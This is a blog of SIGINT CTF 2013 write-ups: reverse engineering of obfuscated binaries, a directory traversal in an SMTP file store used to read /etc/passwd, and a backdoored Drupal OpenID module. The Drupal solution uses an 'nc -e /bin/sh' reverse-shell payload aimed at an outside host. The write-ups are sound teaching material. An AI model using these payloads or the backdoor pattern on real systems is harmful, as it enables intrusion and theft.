Monday, July 22, 2013

SIGINT CTF 2013: Task fenster (400 pts)



In this task we have a binary - fenster.exe (link to original exe: click), which checks if the given text is our sought flag. The executable is obfuscated and contains some anti-debug. The first step is to remove all garbage and produce a clean exe.
So, let's start!

The first debug check is inside TLS callback at 0x4019CB. All it does is:
encrypt(check_for_debugger, 0x1B, 0xEC, 0x00409CD8);
bool debugger = check_for_debugger();
encrypt(check_for_debugger, 0x1B, 0xEC, 0x00409CD8);
if (debugger) {
   exit(0);
}
encrypt(void* data, int size, int key, int* some_data) is a lengthy function (address: 0x40194B) responsible for data encryption / decryption, but its exact implemenation is not relevant to us. As you can see, we can just remove this TLS callback entry from the executable without any consequence later on.

If we enter the check_for_debugger routine, we can see three further anti-debugging techniques:
push ss
pop ss
This is quite tricky. Any modification of the ss register (excluding the lssinstruction) register causes interrupts to be delayed until the end of execution of next instruction. So, if we step through this code using a debugger (step into/over) the code will "escape" the single-stepping mode immediately after one steps into/over "pop ss". We can safely nop these instructions out.
pushfd
pop eax
This was probably inserted only to fool automatic analyzers and decompilators such as Hex-Rays. We can also nop it out.
call <jmp.&KERNEL32.IsDebuggerPresent>
Standard anti-debugging check, we can replace it with "xor eax,eax" or anything else. Those anti-debugs would often show up inside other functions, so watch out while stepping through the executable. ;)

The main function is located at 0x401EF9. It loads user input from stdin and then does the following with different dataA and dataB pointers in seven iterations (anti-debugging code is skipped, check is a function at 0x00401ab5):
encrypt(check, 0x24, KEY, SOME_PTR);
input_ok &= check(dataA, dataB, user_input);
encrypt(check, 0x24, KEY, SOME_PTR);
To make further analysis easier, we should dump the decrypted check function (and all sub-functions, which are encrypted too) and get rid of all calls to encrypt(). Once this is done, we are ready to dive into the check code and switch from OllyDbg to IDA.

After a brief analysis, it is clear that the function passes our input through finite-state machines (compiled regular expressions). The first subfunction at 0x401C44 performs some kind of initialization, the second one at 0x401C9D executes the machine and the last one at 0x401AD9 checks if the machine completed in a final state. The two pointers passed to check are:
  • int*** dataA - machine specification, dataA[state][letter] is a NULL-terminated list of states that we can reach from the given state after a specific letter. Note that states are numbered from 1 to 255 and dataA[0] refers to the first state. Only capital letters cause transitions. Index=0 corresponds to 'A' and index 25 to 'Z'.
  • int* dataB - a null-terminated list of final state indexes
Once we know the meaning of those structures, we can write some visualization and crack the regular expressions. I wrote a small C++ program which reads data from the "fenster" process, generates a graph description for dot and then compiles it to svg. The results are shown below (rectangles = final states, * = all capital letters, ^XY = all capitals without X and Y):

machine0.svg:

machine1.svg: 

machine2.svg: 

machine3.svg: 

machine4.svg: 

machine5.svg: 

machine6.svg: 

Solving them by hand would be painful (look at machine4.svg!), so the next step was to write an optimized brute-force solver. Analyzing the machines shows that:
  • machine0 - input must end with "EN" and the second letter is "E"
  • machine1 - input is a concatenation of pairs: {"NW", "EN", "ES", "CH", "SW", "RG", "GS", "SE", "RE", "GE", "NE"}
  • machine3 - input length is 16
With the above knowledge, we only have to check around 4*11^6 different inputs. The simplest way for me to check if the input was correct was to just reuse the original check function from fenster.exe loaded as a DLL. The solver's code was as follows:
#include <cstring>
#include <cstdio>
#include <Windows.h>
#include <cassert>

using namespace std;

int machines[7] =   { 0x4077A0, 0x407E40, 0x4082E0, 0x408BA0, 0x4098C0, 0x409B48, 0x409C68 };
int end_states[7] = { 0x4077DC, 0x407E70, 0x408300, 0x408BE4, 0x409920, 0x409B58, 0x409C70 };
const int pairscnt = 11;
char* pairs[pairscnt] = {"NW", "EN", "ES", "CH", "SW", "RG", "GS", "SE", "RE", "GE", "NE"};
char key[17] = " E            EN";
int it[7] = {7};
int regex_match, memset_addr;

__declspec(naked) bool __cdecl check()
{
    __asm
    {
        push edi
        push ebp
        mov ebp, esp
        and esp, 0xFFFFFFF0

        mov edi, 0

        looop:
            sub esp,4
            push offset key
            push end_states[edi*4]
            push machines[edi*4]
            call regex_match
            add esp, 0x10
            test eax,eax
            jz hop

            inc edi
            cmp edi, 7
        jnz looop

hop:
        mov esp, ebp
        pop ebp
        pop edi
        retn
    }
}

int main()
{
    int fenster = (int)LoadLibraryA("~fenster2.dll");

    // It doesn't work on bases different from 0x400000,
    // because the binary has no relocations (e.g. final states list pointers)
    // just run it until it works
    assert(fenster == 0x400000);
    regex_match = 0x401d97;
    memset_addr = 0x40C17C;

    // Resolving imports
    *(int*)memset_addr = (int)memset;

    // Assert that last pair is set
    assert(strlen(key) == 16);

    while(it[6] < pairscnt)
    {
        for(int i=0; i<7; i++)
           key[i*2] = pairs[it[i]][0],
           key[i*2+1] = pairs[it[i]][1];
 
        if(check())
            puts(key);
 
        it[0]++;
        for(int i=0; i<6 && it[i]==pairscnt; i++)
            it[i+1]++,
            it[i] = 0;
    }
    return 0;
}
where ~fenster2.dll is a deobfuscated executable, you can download it here: https://docs.google.com/file/d/0B-L9DIAuaV7STkNjNGdBY1RnQ2M/edit?usp=sharing. After running the application for a short while, it spit out the "REGENECHENSESWEN" textual string, which indeed turned out to be the correct flag. +400pts :)

Friday, July 12, 2013

SIGINT CTF 2013: Task 0x90 (300 pts)

The "0x90" task was found in the "reversing" category and was only solved by three teams in the end. The task archive contained two files:

j00ru@xxx:~/sigint/0x90$ ls 
0x90.run xor.bin 

The "xor.bin" file was eight bytes long and contained uninteresting binary data, while "0x90.run" turned out to be a 64-bit statically compiled ELF file of significant size:

j00ru@xxx:~/sigint/0x90$ file 0x90.run
0x90.run: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.24, not stripped
j00ru@xxx:~/sigint/0x90$ du -hs 0x90.run
3.0M    0x90.run


Starting the program on an older machine throws the following error message:

Fatal Error: This program was not built to run on the processor in your system.
The allowed processors are: Intel(R) processors with SSE4.2 and POPCNT instructions support.


Interesting! Repeating the same action on a more recent hardware configuration doesn't seem to yield any evident results - the application successfully starts and extensively consumes CPU resources (using trigonometric functions), but nothing much happens on stdout:

(gdb) r
Starting program: /home/mjurczyk/Downloads/sigint/0x90/0x90.run 
^C
Program received signal SIGINT, Interrupt.
0x000000000040399f in atan.L ()
(gdb)

Lacking ways to interact with a running process, we decided to do some actual reverse engineering at this point. If you load the file up in IDA and take a brief look at the entry point, it is clearly visible that the executable was built with the Intel C++ Compiler (ICC):


Following a cursory analysis, we were able to establish the logic of the challenge and its actual goal. Long story short, the program stores a 64-bit hash throughout its entire lifetime, gradually forming its final value in the following manner:
hash ‹ 0xC23F3048EA749B76
if (ptrace(PTRACE_TRACEME) succeeds) {
  hash++
}
hash = merge_hashes(hash, calculate_hash(strip(argv[0]), strlen(strip(argv[0]))))
for (int i = 0; i < 1000; i++) {
  benchmark()
  hash = merge_hashes(hash, calculate_hash(image_base, image_size))
  hash += open64("/proc/self/status")
}
hash ^= xor.bin file contents

The program would then print out "sigint_" followed by the binary hash value casted to a textual form (i.e. each byte of the hash should be printable at this point, if it is valid). The exact implementations of the "merge_hashes" and "calculate_hash" functions are not relevant at this point; it is only important to note that the first ones `reduces` two 64-bit values into a single one using binary and arithmetic operations, whereas the second one calculates a 64-bit hash value given an input memory area.

In theory, obtaining the flag should be as easy as launching the executable and observing stdout. What makes it an actual challenge is the presence of the benchmark function, which further invokes one of two subroutines, depending on the CPU capabilities: benchmark_kerneldi_W and benchmark_kerneldi_A. In essence, each function were programmed to perform 10.000.000.000.000 (ten trillion) iterations of expensive SSE4.2 operations - something that would never realistically complete within the time frame of the CTF, which is where the problems begin.

There are several important conclusions we can draw here:
  1. we would like the program to complete in reasonable time, i.e. get rid of the time consuming benchmark loop.
  2. we would like the final hash to be equal to one which would be generated with the loop in place, which indicates that:
    1. the authors most likely expect us to use the original filename for the file, we should not change it.
    2. we should be careful attaching a debugger to the program because doing so might affect the output if we're not careful.
    3. also attaching a remote debugger past the ptrace() call is not possible.
    4. the program should use non-modified memory for hash computation, if we decide to make any alterations to its executable code.
    5. all calls to functions which make use of global variables (e.g. srand) are crucial and cannot be ommitted.
    6. file descriptors returned by open64 should be identical to ones returned normally (relevant to gdb, which creates additional descriptors in the target process and thus affects open64 return values).
 Considering the volume of requirements above, it is fairly troublesome to patch the program in a way that emulates the normal execution environment, but still removes the lengthy loop. While it is surely possible to develop such a patch, it is by no means elegant. The perfect solution would be to either:
  • obtain the correct return values of the "calculate_hash" function for argv[0] and program memory during each iteration, and create our own implementation of the final hash calculation, or ...
  • ... remove the loop in a way that does not require modifying the code of the loop itself, i.e. on CPU level.
Note that while changing the semantics of an instruction would typically require an x86 hardware debugger or ability to apply arbitrary microcode updates, there is a much easier way - you could use a CPU emulator, such as Bochs!

As both Gynvael and I had some prior experience with writing Bochs instrumentation (see here and here), I was happy to implement the idea. The next few minutes of development resulted in the creation of the following short code snippet:

#include <stdint.h>
#include <stdarg.h>
#include <time.h>

#include "bochs.h"
#include "cpu/cpu.h"
#include "cpu/instr.h"

#include "instrument.h"

#ifndef RAX
# define RAX pcpu->gen_reg[BX_64BIT_REG_RAX].rrx
#endif  // RAX

#ifndef RBX
# define RBX pcpu->gen_reg[BX_64BIT_REG_RBX].rrx
#endif  // RBX

#ifndef RIP
# define RIP pcpu->prev_rip
#endif  // RIP

void bx_instr_before_execution(unsigned cpu, bxInstruction_c *i) {
  static unsigned int adjustements = 0;

  BX_CPU_C *pcpu = BX_CPU(cpu);
  if (!pcpu->protected_mode()) {
    return;
  }

  if (RAX == 10000000000000LL) {
    RAX = 2;
    fprintf(stderr, "[sigint_0x90] {%u} Special RAX found and adjusted at RIP=%llx, %u\n",
            time(NULL), RIP, ++adjustements);
    fflush(stderr);
  } else if (RIP == 0x402669 && (RBX & 0xffffffff00000000LL)) {
    fprintf(stderr, "[sigint_0x90] {%u} Hash value: %llx\n", time(NULL), RBX);
    fflush(stderr);
  } else if (RIP == 0x4026e9 && RAX == RBX && RAX < 0x10000) {
    fprintf(stderr, "[sigint_0x90] {%u} open64() fd: %llx\n", time(NULL), RAX);
    fflush(stderr);
  }
}

The code would serve three different purposes - nullifying the benchmark loop and displaying information about the static image hash value and open64 syscall return value for each of 1000 external loop iterations. After building Bochs, booting up an Ubuntu 13.04 Server 64-bit guest (we happened to have a Bochs hdd image handy due to unrelated bochspwn project activity) and starting the 0x90.run executable, we could observe the following emulator console output:
While the executable in the guest system was running at around one iteration of the external loop per second, I reverse engineered and rewrote the merge_hashes, calculate_hash and final hash generation code to C++. Once I found that the static image hash is 0x79082a819dc08d7f for every loop iteration (i.e. no static memory of the program changes between) and the open64 numeric file descriptor values start at 4 and increment by one, I ended up with the following implementation:
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <stdint.h>
using namespace std;

uint64_t hash_region(const char *data, uint32_t length) {
  uint64_t h = 0;
  for (uint32_t i = 0; i < length; i++) {
    h = (h << 6) + (h << 16) - h + data[i];
  }
  return h;
}

uint64_t merge_hashes(uint64_t h, uint64_t g) {
  return ((g << 16) - g + (h << 8) + h);
}

int main() {
  const uint64_t kChallengeImageHash = 0x79082a819dc08d7f;
  const uint64_t kXorConstant = 0x6704b2e715d8d012;
  const char filename[] = "/0x90.run";

  // Initial value from: 
  //   mov     rbx, 0C23F3048EA749B76h
  uint64_t hash = 0xC23F3048EA749B76LL;

  // increment for failed ptrace(PTRACE_TRACEME); debugged process.
  // hash++;

  hash = merge_hashes(hash, hash_region(filename, strlen(filename)));

  // 1000 is a constant number of iterations:
  //   cmp     r14, 1000
  //   jb      loc_402546
  unsigned int open64_fd = 4;
  for (unsigned int i = 0; i < 1000; i++, open64_fd++) {
    hash = merge_hashes(hash, kChallengeImageHash) + open64_fd;
  }

  // Final stage: xor with the contents of xor.bin.
  hash ^= kXorConstant;

  // Display solution.
  uint8_t hash_string[12];
  memcpy(hash_string, &hash, sizeof(uint64_t));
  hash_string[8] = '\0';
  printf("hash(\"%s\") = %llx, sigint_%s\n", filename, hash, hash_string);

  return 0;
}

The output of the above code was as follows:

hash("/0x90.run") = 52336d6d6148636d, sigint_mcHamm3R

As you can imagine, "sigint_mcHamm3R" turned out to be the correct flag. +300 points. :) While writing a C++ turned out to be faster than waiting for 0x90.run to complete in Bochs, you could as well just wait for around 30 minutes and grab the flag directly from the program standard output:


Monday, July 8, 2013

SIGINT CTF 2013: Task mail (100 pts)

Task description:
Date: Sun, 30 Jun 2013 13:37:00 +0200
From: sales@cloud.cloud
To: hans@ck.er
message-id: c524e67c59dfd30c511baeda8197fc9a@cloud.cloud
Subject: Re: Evaluation of your B2B Storage Cloud Solution
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="--==_mimepart_51d5c59b14bda_1fbbba2fe89623d";
charset=UTF-8Content-Transfer-Encoding: 7bit

----==_mimepart_51d5c59b14bda_1fbbba2fe89623d
Mime-Version: 1.0
Content-Type: text/plain;
charset=UTF-8
Content-Transfer-Encoding: 7bit

Dear Customer,

I am glad you are considering our Cloud for your large scale needs. In
response to your desire to evaluate the security of our cloud, I have
attached all relevant sourcecode to this mail. Our trained technicians
ensured me, of it beeing only best quality software. You will not be
disapointed. We have also set up a test deployment especially for you,
you may access it through test@b3.ctf.sigint.ccc.de.

We have invested quite a lot of money to be able to deliver you such
cloud service. As you may already know most insecure cloud offerings
are based the HTTP protocol. We have identified e-mail, which is the
backbone of modern business, as the optimal approach to deliver you
a secure and reliable cloud.

Looking forward to our business relationship.

Best regards from your
cloud.cloud sales represantitive

----==_mimepart_51d5c59b14bda_1fbbba2fe89623d
Mime-Version: 1.0
Content-Type: application/x-bzip2;
charset=UTF-8;
filename=source.tar.bz2
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=source.tar.bz2

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

----==_mimepart_51d5c59b14bda_1fbbba2fe89623d--
So as you can see, along with the message about new cloud software we also received
an attachment, which could be easily decoded using python: 
>>> from base64 import b64decode
>>> with open("encoded.txt", "r") as file: content = file.read().replace("\n", "")
...
>>> with open("source.tar.bz2", "w") as file: file.write(b64decode(content))
... 
After unpacking the archive, we ended up with handler.rb, a source of file storage system based on SMTP:
#!/usr/bin/ruby

require "pathname"
Dir.chdir(Pathname.new(__FILE__).dirname.to_s)

require "mail"

mail_size_limit= 16*1024
user_size_limit= 1024**2
users_dir= Pathname.new("user")

raw_incoming_mail= STDIN.read(mail_size_limit)
incoming_mail= Mail.new(raw_incoming_mail)

user= [incoming_mail.from].flatten[0].gsub('"', "")
exit 1 unless user
exit 1 unless user=~ /@/
subject= incoming_mail.subject
exit 1 unless subject
user_dir= users_dir + user.split("@", 2).reverse.join("___")
size_file= user_dir + ".size"
tmp_size_file= user_dir + ".size_tmp"

def send_response(original_mail, response_string, attachment= nil, response_subject=nil)
 Mail.deliver do |mail|
  to original_mail.from
  from original_mail.to
  subject response_subject || "Re: #{original_mail.subject}"
  add_file attachment if attachment
  body <<EOF
#{response_string}

--------
available commands:
signup
list
put
get <filename>
delete <filename>
share <filename> <user>
EOF
 end
end

def send_error(original_mail, error_string)
 Mail.deliver do |mail|
  to original_mail.from
  from original_mail.to
  subject "error Re: #{original_mail.subject}"
  body <<EOF
I am sorry to inform you, that your requested command could not be executed.
The reason is:

#{error_string}
EOF
 end
end

case subject
when "signup"
 if user_dir.directory?
  send_error(incoming_mail, "your are already signed up")
  exit
 end
 unless (user_dir+"../.signup_allowed").file?
  send_error(incoming_mail, "signup is currently disabled")
  exit
 end
 user_dir.mkdir
 size_file.open("w") { |f| f.puts 0 }
 send_response(incoming_mail, "signup successfull")
when "list"
 unless user_dir.directory?
  send_error(incoming_mail, "you are not signed up")
  exit
 end
 file_listing= "your_files:\n" +
 user_dir.children.select do |file|
  file.basename.to_s[0] != ?.
 end.collect do |file|
  "#{file.basename} #{file.size/1024.0}Kb"
 end.join("\n")
 send_response(incoming_mail, file_listing)
when /\Aget ([A-Za-z0-9_-]+(\.[a-z0-9]+)?)\Z/
 file_name= $1
 file_path= user_dir+file_name
 unless user_dir.directory?
  send_error(incoming_mail, "you are not signed up")
  exit
 end
 unless file_path.file?
  send_error(incoming_mail, "the requested file does not exist")
  exit
 end
 send_response(incoming_mail, "here is your requested file", file_path.to_s)
when /\Ashare ([A-Za-z0-9_-]+(\.[a-z0-9]+)?) ([A-Za-z0-9][A-Za-z0-9._-]*@([A-Za-z0-9-]+\.)+[A-Za-z]+)\Z/
 file_name= $1
 second_user= $3
 file_path= user_dir+file_name
 unless user_dir.directory?
  send_error(incoming_mail, "you are not signed up")
  exit
 end
 unless file_path.file?
  send_error(incoming_mail, "the requested file does not exist")
  exit
 end
 second_user_dir= users_dir + second_user.split("@", 2).reverse.join("___")
 second_size_file= second_user_dir + ".size"
 second_file_path= second_user_dir + file_name
 unless second_size_file.file?
  send_error(incoming_mail, "the given user is not signed up")
  exit
 end
 if second_file_path.exist?
  send_error(incoming_mail, "file cannot be shared for unknown reasons")
  exit
 end
 second_file_path.make_symlink(file_path.to_s.sub("user/", "../"))
 send_response(incoming_mail, "file shared", file_path.to_s)
when /\Adelete ([A-Za-z0-9_-]+(\.[a-z0-9]+)?)\Z/
 file_name= $1
 file_path= user_dir+file_name
 user_size= begin
  size_file.read.to_i
 rescue Errno::ENOENT
  send_error(incoming_mail, "you are not signed up")
  exit
 end
 unless file_name[0] != ?. and file_path.file?
  send_error(incoming_mail, "the requested file does not exist")
  exit
 end
 user_size-= file_path.size
 file_path.unlink
 tmp_size_file.open("w") { |f| f.puts user_size }
 tmp_size_file.rename(size_file)
 send_response(incoming_mail, "file deleted")
when "put"
 user_size= begin
  size_file.read.to_i
 rescue Errno::ENOENT
  send_error(incoming_mail, "you are not signed up")
  exit
 end
 attachment= incoming_mail.attachments[0]
 unless attachment and attachment.filename=~ /\A([A-Za-z0-9_-]+(\.[a-z0-9]+)?)\Z/
  send_error(incoming_mail, "no valid attachment found")
  exit
 end
 file_path= user_dir+attachment.filename
 if file_path.exist?
  send_error(incoming_mail, "file already exists")
  exit
 end
 attachement_body= attachment.body.decoded
 user_size+= attachement_body.size
 if user_size > user_size_limit
  send_error(incoming_mail, "you have no space left")
  exit
 end
 tmp_size_file.open("w") { |f| f.puts user_size }
 tmp_size_file.rename(size_file)
 file_path.open("w") { |f| f.write attachement_body }
 send_response(incoming_mail, "file saved")
end
After a quick code analysis we noticed that there was directory traversal vulnerability in the "From" header ("user" variable) and its only requirement was to have a '@' character somewhere within the string. In order to exploit the flaw, we could send the following message to test@b3.ctf.sigint.ccc.de:

HELO vnd.name
MAIL FROM: <vnd@vnd.name>
DATA
From: vnd/../@vnd.name
Subject: list
.
QUIT

However, because the return message containing a listing was sent back to the address specified in the "From" header, and e-mail addresses containing a '/' character are usually considered invalid, we needed to either patch an existing SMTP server or, what seemed to be a better option, write a very basic one from scratch using handy libraries. Furthermore, some DNS changes of MX records were required to redirect e-mail traffic to our box. The source code of a trivial SMTP server is as follows:
from datetime import datetime
import asyncore
from smtpd import SMTPServer

class RemoteServer(SMTPServer):
   no = 0
   def process_message(self, peer, mailfrom, rcpttos, data):
       filename = '%05d-%s.txt' % (self.no, datetime.now().strftime('%Y%m%d%H%M%S'))
       self.no += 1
       f = open(filename, 'w')
       f.write("%s\n%s\n%s\n" % (str(peer), str(mailfrom), str(rcpttos)))
       f.write(data)
       f.close
       print '%s saved.' % filename

def run():
   foo = RemoteServer(('0.0.0.0', 25), ('0.0.0.0', 25))
   try:
       asyncore.loop()
   except KeyboardInterrupt:
       pass

if __name__ == '__main__':
  run()

By using the above code, we could finally receive the list of registered users. As the flag was found in the /etc/passwd file (it took a while to guess that), we fetched it using the "get" method of the storage system.

HELO somehost
MAIL FROM: <vnd@vnd.name>
DATA
From: vnd/../../../../etc/@vnd.name
Subject: get passwd
.
QUIT

The file was sent in the attachment format, so we needed to unpack it again. The original contents of the file were as shown below:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
challenge:x:1000:1000:SIGINT_do_not_trust_mail_addresses_17808d2cf719541b:/home/challenge:/bin/bash
postfix:x:106:114::/var/spool/postfix:/bin/false

The "SIGINT_do_not_trust_mail_addresses_17808d2cf719541b" flag visibly stood out in the file. It worked right away, +100pts. :)

SIGINT CTF 2013: Task bloat (200 pts)



The "source code" was basically 45 MB of Drupal code with several additional themes installed.
The idea to solve the task was plain and simple (though the execution was a little bit tricky):
  1. Diff the source against original Drupal in the same version.
  2. Find the backdoor in diffs.
  3. Use the backdoor to own the live website.

Doing the diff

The newest entry in CHANGELOG file was this:

Drupal 7.20, 2013-02-20

After downloading this exact version from the Drupal website and performing a diff (diff -r) on both directories, we quickly found out that there were several global changes ("diff obfuscations", if you will) applied to the "bloat source code":

  • All the comments had been removed.
  • Some variable names per function had been changed to random English words (e.g. $output to $breviary).
  • White-spaces had been randomized.

Of course doing a diff on this turned out to yield lots and lots of false-positives. This called for a fuzzy diff which would ignore the "diff obfuscations"!

We achieved the fuzzy diff the following way (this was made for each "bloat" and original Drupal file):

  • Run php -w on it (-w is "remove comments and whitespaces").
  • Run a python script (source in Appendix A) which:
    • added \n after ) and ;
    • removed { and }
    • changed "\t" "\r" and two spaces to a \n
    • removed additional space after ->
    • removed all variable names

And after this we ran a recursive diff again.

Looking for the backdoor

The diff outputted a 50kB file where most of the changes were either some leftover "diff obfuscations" (a small amount, easily ignored) or changes to .info files (datestamp, "Information added by [drush|drupal]").

Apart from that, there were a couple of meaningful differences, the most of which were in OpenID module (please note this is the "fuzzy" output, so it's kinda unreadable):

openid.inc
diff -r ./bloat/modules/openid/openid.inc \
        ./durpal_same_ver/drupal-7.20/modules/openid/openid.inc
4c4
< define('OPENID_DH_DEFAULT_GEN', '86')
---
> define('OPENID_DH_DEFAULT_GEN', '2')
openid.module
diff -r ./bloat/modules/openid/openid.module \
        ./durpal_same_ver/drupal-7.20/modules/openid/openid.module
184c184
< $ = openid_discovery($)
---
> $ = openid_normalize($)
186,189c186
< if(strpos($, '@')
< )
< list($, $)
< = explode('@', $, 2)
---
> $ = openid_discovery($)
191,192d187
< else $ = false;
< $ = false;
216,221c211
< else $ = _openid_dh_long_to_base64($ * OPENID_DH_DEFAULT_GEN)
< ;
< $['uri'] = drupal_map_assoc(array($)
< , $)
< ;
< if (!empty($['claimed_id'])
---
> else if (!empty($['claimed_id']) 
The thing that was really weird was the OPENID_DH_DEFAULT_GEN set to 86 - after a lot of browsing we came to the conclusion that no one ever changes that value.

Looking into the original "bloat" code revealed these exact changes in the openid.module file (in openid_begin function):
if(strpos($imaginably, '@'))
{
 list($user, $host) = explode('@', $imaginably, 2);
}
else
  {
   $user = false;
   $host = false;
   }
...
$user_enc = _openid_dh_long_to_base64($user * OPENID_DH_DEFAULT_GEN);
  $service['uri'] = drupal_map_assoc(array($host), $user_enc);
It looks quite innocent at the first glance. And at the second maybe too.

The key is the drupal_map_assoc function, which has the following prototype:

drupal_map_assoc($array, $function = NULL)

Parameters
$array: A linear array.
$function: A name of a function to apply to all values before output.

So basically $user_enc contains a function name that will be called with the $host parameter - now this doesn't look innocent at all!

Yes - we found the backdoor.

Exploiting the backdoor

The open_begin function is easily reachable from the outside - in the Login subpage you choose "Log in using OpenID", and whatever you pass is put in the $imaginably parameter.


Analyzing the changes you can see that $imaginably is split in two on the first "@" character into $user and $host.

The $user is then multiplied by OPENID_DH_DEFAULT_GEN (86), and put to a "long int to base64" function (_openid_dh_long_to_base64), and this is stored in the end in the $user_enc variable, which is passed as the name of the function that is going to be called.

Now the problem is to get the proper integer values for actual functions. After some attempts we settled for a brute force approach (source in Appendix B), which tested different numbers and after a couple of seconds outputted these two:

93802 exec
96141 file

The exec function is exactly what we needed!

The $host parameter remained unchanged so we could try to "log in" using this OpenID ID:

93802@nc -e /bin/sh our_sever_ip 1234

And this resulted in a reverse shell. The rest was a formality:

And that's it! +200 pts :)

Appendix A: Python script for "diff deobfuscation"

import sys
import re

if len(sys.argv) != 2:
 print "usage: go.py "
 sys.exit(1)

f = open(sys.argv[1], "r")
d = f.read()
f.close()

o = ""
o = d.replace(';', ';\n')

# { and } and \t
o = o.replace('{','')
o = o.replace('}','')
o = o.replace('\t','\n')
o = o.replace('\r','\n')
o = o.replace('  ','\n')
o = o.replace('-> ', '->')
o = o.replace(')',')\n')

# Spaces and lines.
o = o.split('\n')
o = map(lambda x: x.strip(), o)
o = filter(lambda x: len(x) > 0, o)
o = '\n'.join(o)

# Variable names.
d = o
o = ""
i = 0
while i < len(d):
 if d[i] != '$':
   o += d[i]
   i += 1
   continue

 o += '$'
